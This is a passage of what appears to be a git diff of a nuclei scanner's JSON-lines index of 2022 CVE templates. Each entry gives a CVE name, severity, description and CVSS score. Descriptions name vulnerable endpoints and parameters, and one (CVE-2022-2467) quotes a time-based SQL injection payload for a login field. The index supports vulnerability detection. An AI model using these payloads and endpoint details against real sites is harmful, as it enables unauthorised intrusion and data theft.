requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-2414.yaml"} {"ID":"CVE-2022-24181","Info":{"Name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","Severity":"medium","Description":"PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24181.yaml"} {"ID":"CVE-2022-24223","Info":{"Name":"Atom CMS v2.0 - SQL Injection","Severity":"critical","Description":"AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24223.yaml"} {"ID":"CVE-2022-24260","Info":{"Name":"VoipMonitor - Pre-Auth SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24260.yaml"} @@ -1536,10 +1639,11 @@ {"ID":"CVE-2022-24265","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/\u0026menu_filter=3 parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24265.yaml"} {"ID":"CVE-2022-24266","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24266.yaml"} {"ID":"CVE-2022-24288","Info":{"Name":"Apache Airflow OS Command Injection","Severity":"high","Description":"Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-24288.yaml"} +{"ID":"CVE-2022-24384","Info":{"Name":"SmarterTools SmarterTrack - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24384.yaml"} {"ID":"CVE-2022-2462","Info":{"Name":"WordPress Transposh \u003c=1.0.8.1 - Information Disclosure","Severity":"medium","Description":"WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2462.yaml"} {"ID":"CVE-2022-2467","Info":{"Name":"Garage Management System 1.0 - SQL Injection","Severity":"critical","Description":"Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2467.yaml"} {"ID":"CVE-2022-24681","Info":{"Name":"ManageEngine ADSelfService Plus \u003c6121 - Stored Cross-Site Scripting","Severity":"medium","Description":"ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24681.yaml"} -{"ID":"CVE-2022-24716","Info":{"Name":"Icinga Web 2 - Arbitrary File Disclosure","Severity":"high","Description":"Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-24716.yaml"} +{"ID":"CVE-2022-24716","Info":{"Name":"Icinga Web 2 - Arbitrary File Disclosure","Severity":"high","Description":"Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24716.yaml"} {"ID":"CVE-2022-24816","Info":{"Name":"GeoServer \u003c1.2.2 - Remote Code Execution","Severity":"critical","Description":"Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24816.yaml"} {"ID":"CVE-2022-24856","Info":{"Name":"Flyte Console \u003c0.52.0 - Server-Side Request Forgery","Severity":"high","Description":"FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24856.yaml"} {"ID":"CVE-2022-2486","Info":{"Name":"Wavlink WN535K2/WN535K3 - OS Command Injection","Severity":"critical","Description":"Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2486.yaml"} @@ -1550,8 +1654,11 @@ {"ID":"CVE-2022-24990","Info":{"Name":"TerraMaster TOS \u003c 4.2.30 Server Information Disclosure","Severity":"high","Description":"TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24990.yaml"} {"ID":"CVE-2022-25082","Info":{"Name":"TOTOLink - Unauthenticated Command Injection","Severity":"critical","Description":"TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-25082.yaml"} {"ID":"CVE-2022-25125","Info":{"Name":"MCMS 5.2.4 - SQL Injection","Severity":"critical","Description":"MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-25125.yaml"} +{"ID":"CVE-2022-25148","Info":{"Name":"WordPress Plugin WP Statistics \u003c= 13.1.5 - SQL Injection","Severity":"critical","Description":"The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-25148.yaml"} +{"ID":"CVE-2022-25149","Info":{"Name":"WordPress Plugin WP Statistics \u003c= 13.1.5 - SQL Injection","Severity":"high","Description":"The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-25149.yaml"} {"ID":"CVE-2022-25216","Info":{"Name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","Severity":"high","Description":"DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-25216.yaml"} {"ID":"CVE-2022-25323","Info":{"Name":"ZEROF Web Server 2.0 - Cross-Site Scripting","Severity":"medium","Description":"ZEROF Web Server 2.0 allows /admin.back cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-25323.yaml"} +{"ID":"CVE-2022-2535","Info":{"Name":"SearchWP Live Ajax Search \u003c 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure","Severity":"medium","Description":"The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2535.yaml"} {"ID":"CVE-2022-25356","Info":{"Name":"Alt-n/MDaemon Security Gateway \u003c=8.5.0 - XML Injection","Severity":"medium","Description":"Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-25356.yaml"} {"ID":"CVE-2022-25369","Info":{"Name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","Severity":"critical","Description":"Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-25369.yaml"} {"ID":"CVE-2022-2544","Info":{"Name":"WordPress Ninja Job Board \u003c 1.3.3 - Direct Request","Severity":"high","Description":"WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-2544.yaml"} @@ -1564,14 +1671,15 @@ {"ID":"CVE-2022-25489","Info":{"Name":"Atom CMS v2.0 - Cross-Site Scripting","Severity":"medium","Description":"Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the \"A\" parameter in /widgets/debug.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-25489.yaml"} {"ID":"CVE-2022-25497","Info":{"Name":"Cuppa CMS v1.0 - Local File Inclusion","Severity":"medium","Description":"CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-25497.yaml"} {"ID":"CVE-2022-2551","Info":{"Name":"WordPress Duplicator \u003c1.4.7 - Authentication Bypass","Severity":"high","Description":"WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-2551.yaml"} +{"ID":"CVE-2022-25568","Info":{"Name":"MotionEye Config Info Disclosure","Severity":"high","Description":"MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-25568.yaml"} {"ID":"CVE-2022-2599","Info":{"Name":"WordPress Anti-Malware Security and Brute-Force Firewall \u003c4.21.83 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2599.yaml"} {"ID":"CVE-2022-26134","Info":{"Name":"Confluence - Remote Code Execution","Severity":"critical","Description":"Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26134.yaml"} {"ID":"CVE-2022-26138","Info":{"Name":"Atlassian Questions For Confluence - Hardcoded Credentials","Severity":"critical","Description":"Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26138.yaml"} {"ID":"CVE-2022-26148","Info":{"Name":"Grafana \u0026 Zabbix Integration - Credentials Disclosure","Severity":"critical","Description":"Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26148.yaml"} {"ID":"CVE-2022-26159","Info":{"Name":"Ametys CMS Information Disclosure","Severity":"medium","Description":"Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-26159.yaml"} {"ID":"CVE-2022-26233","Info":{"Name":"Barco Control Room Management Suite \u003c=2.9 Build 0275 - Local File Inclusion","Severity":"high","Description":"Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the \"GET /..\\..\" substring.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-26233.yaml"} -{"ID":"CVE-2022-26263","Info":{"Name":"Yonyou U8 13.0 - Cross-Site Scripting","Severity":"medium","Description":"Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-26263.yaml"} -{"ID":"CVE-2022-2627","Info":{"Name":"WordPress Newspaper \u003c12 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2627.yaml"} +{"ID":"CVE-2022-26263","Info":{"Name":"Yonyou U8 13.0 - Cross-Site Scripting","Severity":"medium","Description":"Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26263.yaml"} +{"ID":"CVE-2022-2627","Info":{"Name":"WordPress Newspaper \u003c 12 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2627.yaml"} {"ID":"CVE-2022-2633","Info":{"Name":"All-In-One Video Gallery \u003c=2.6.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-2633.yaml"} {"ID":"CVE-2022-26352","Info":{"Name":"DotCMS - Arbitrary File Upload","Severity":"critical","Description":"DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26352.yaml"} {"ID":"CVE-2022-26564","Info":{"Name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26564.yaml"} @@ -1631,6 +1739,7 @@ {"ID":"CVE-2022-31269","Info":{"Name":"Linear eMerge E3-Series - Information Disclosure","Severity":"high","Description":"Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-31269.yaml"} {"ID":"CVE-2022-31299","Info":{"Name":"Haraj 3.7 - Cross-Site Scripting","Severity":"medium","Description":"Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-31299.yaml"} {"ID":"CVE-2022-31373","Info":{"Name":"SolarView Compact 6.00 - Cross-Site Scripting","Severity":"medium","Description":"SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-31373.yaml"} +{"ID":"CVE-2022-3142","Info":{"Name":"NEX-Forms Plugin \u003c 7.9.7 - SQL Injection","Severity":"high","Description":"The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-3142.yaml"} {"ID":"CVE-2022-31474","Info":{"Name":"BackupBuddy - Local File Inclusion","Severity":"high","Description":"BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-31474.yaml"} {"ID":"CVE-2022-31499","Info":{"Name":"Nortek Linear eMerge E3-Series \u003c0.32-08f - Remote Command Injection","Severity":"critical","Description":"Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31499.yaml"} {"ID":"CVE-2022-31656","Info":{"Name":"VMware - Local File Inclusion","Severity":"critical","Description":"VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31656.yaml"} @@ -1662,6 +1771,7 @@ {"ID":"CVE-2022-32094","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"critical","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32094.yaml"} {"ID":"CVE-2022-32195","Info":{"Name":"Open edX \u003c2022-06-06 - Cross-Site Scripting","Severity":"medium","Description":"Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32195.yaml"} {"ID":"CVE-2022-32409","Info":{"Name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","Severity":"critical","Description":"Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32409.yaml"} +{"ID":"CVE-2022-3242","Info":{"Name":"Microweber \u003c1.3.2 - Cross-Site Scripting","Severity":"medium","Description":"Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-3242.yaml"} {"ID":"CVE-2022-32429","Info":{"Name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","Severity":"critical","Description":"MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32429.yaml"} {"ID":"CVE-2022-32444","Info":{"Name":"u5cms v8.3.5 - Open Redirect","Severity":"medium","Description":"u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32444.yaml"} {"ID":"CVE-2022-32770","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32770.yaml"} @@ -1677,6 +1787,8 @@ {"ID":"CVE-2022-34047","Info":{"Name":"WAVLINK WN530HG4 - Improper Access Control","Severity":"high","Description":"WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34047.yaml"} {"ID":"CVE-2022-34048","Info":{"Name":"Wavlink WN-533A8 - Cross-Site Scripting","Severity":"medium","Description":"Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34048.yaml"} {"ID":"CVE-2022-34049","Info":{"Name":"WAVLINK WN530HG4 - Improper Access Control","Severity":"medium","Description":"Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-34049.yaml"} +{"ID":"CVE-2022-34093","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34093.yaml"} +{"ID":"CVE-2022-34094","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34094.yaml"} {"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34121.yaml"} {"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34328.yaml"} {"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Improper Access Control","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34576.yaml"} @@ -1693,6 +1805,7 @@ {"ID":"CVE-2022-35914","Info":{"Name":"GLPI \u003c=10.0.2 - Remote Command Execution","Severity":"critical","Description":"GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-35914.yaml"} {"ID":"CVE-2022-36446","Info":{"Name":"Webmin \u003c1.997 - Authenticated Remote Code Execution","Severity":"critical","Description":"Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-36446.yaml"} {"ID":"CVE-2022-36537","Info":{"Name":"ZK Framework - Information Disclosure","Severity":"high","Description":"ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-36537.yaml"} +{"ID":"CVE-2022-36553","Info":{"Name":"Hytec Inter HWL-2511-SS - Remote Command Execution","Severity":"critical","Description":"Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-36553.yaml"} {"ID":"CVE-2022-36642","Info":{"Name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","Severity":"critical","Description":"Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-36642.yaml"} {"ID":"CVE-2022-36804","Info":{"Name":"Atlassian Bitbucket - Remote Command Injection","Severity":"high","Description":"Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-36804.yaml"} {"ID":"CVE-2022-36883","Info":{"Name":"Jenkins Git \u003c=4.11.3 - Missing Authorization","Severity":"high","Description":"Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-36883.yaml"} @@ -1706,12 +1819,13 @@ {"ID":"CVE-2022-38295","Info":{"Name":"Cuppa CMS v1.0 - Cross Site Scripting","Severity":"medium","Description":"Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38295.yaml"} {"ID":"CVE-2022-38296","Info":{"Name":"Cuppa CMS v1.0 - Arbitrary File Upload","Severity":"critical","Description":"Cuppa CMS v1.0 was discovered to contain an 